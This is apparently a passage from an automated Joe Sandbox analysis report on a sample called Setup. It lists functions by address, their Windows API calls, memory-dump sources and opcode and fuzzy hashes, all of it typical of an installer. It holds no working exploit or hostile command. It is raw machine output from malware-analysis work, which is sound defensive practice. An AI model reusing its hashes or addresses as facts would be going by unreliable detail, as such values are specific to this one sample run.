                                                                  Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                  • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                  • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                  • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                  Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                  • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                  • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                  • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                  • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                  • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                  • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                  Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                  • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                  • String ID:
                                                                  • API String ID: 4115351271-0
                                                                  • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                  • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                  • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                  • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                  Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                  • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                  • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                  • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                  • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                  • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                  • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                  Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                  • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                  • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                  • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                  Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                  • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                  • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                  • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                  Non-executed Functions

                                                                  Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                  • DeleteObject.GDI32(?), ref: 00404AA5
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                  • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                  • ShowWindow.USER32(00000000), ref: 00404F87
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $ @$M$N
                                                                  • API String ID: 1638840714-3479655940
                                                                  • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                  • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                  • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                  • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                  Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                  • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                  • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                  • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                  • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                  • FindClose.KERNEL32(?), ref: 00406E5F
                                                                  Strings
                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                  • ptF, xrefs: 00406D1A
                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                  • \*.*, xrefs: 00406D2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                  • API String ID: 2035342205-1650287579
                                                                  • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                  • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                  • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                  • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                  Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                  • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                  • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                  • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                  • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                    • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                    • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                  • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                  • String ID: F$A
                                                                  • API String ID: 3347642858-1281894373
                                                                  • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                  • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                  • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                  • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                  Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
